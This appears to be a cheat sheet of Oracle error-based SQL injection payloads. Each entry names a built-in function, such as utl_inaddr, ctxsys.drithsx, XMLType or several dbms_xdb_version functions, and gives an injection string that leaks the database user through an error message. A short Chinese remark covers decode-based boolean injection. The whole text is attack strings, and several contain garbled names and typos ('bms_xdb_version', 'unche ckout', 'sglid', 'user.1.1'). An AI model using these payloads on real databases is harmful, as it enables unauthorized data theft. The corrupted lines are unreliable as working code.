utl_inaddr.get_host_name()and 1=utl_inaddr.get_host_name((select user from dual)) — -ctxsys.drithsx.sn()and 1 =ctxsys.drithsx.sn(1,(select user from dual)) — -XMLType()and (select upper(XMLType(chr(60)||chr(58)||(select user from dual) ||chr(62))) from dual) is not null —dbms_xdb_version.checkin()and(select dbms_xdb_version.checkin((select user from dual))from dual)is not null — -bms_xdb_version.makeversioned()and(select bms_xdb_version.makeversioned((select user from dual))from dual)is not null — -dbms_xdb_version.uncheckout()and (select dbms xdb_version. unche ckout((select user from dual)) from dual) is not null —dbms_utility.sglid_to_sqlhash()and (select dbms_utlity.sqlid_to_sqlhash((select user from dual)) from dual) is not null — -ordsys.ord_dicom.getmappingxpath()and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)— - decode进行报错注入这种方式更偏向布尔型注入,因为这种方式并不会通过报错把查询结果回显回来,仅是用来作为页面的表现不同的判断方法and 1=(select decode(substr(user.1.1).’s’,(1/0),0) from dual)— -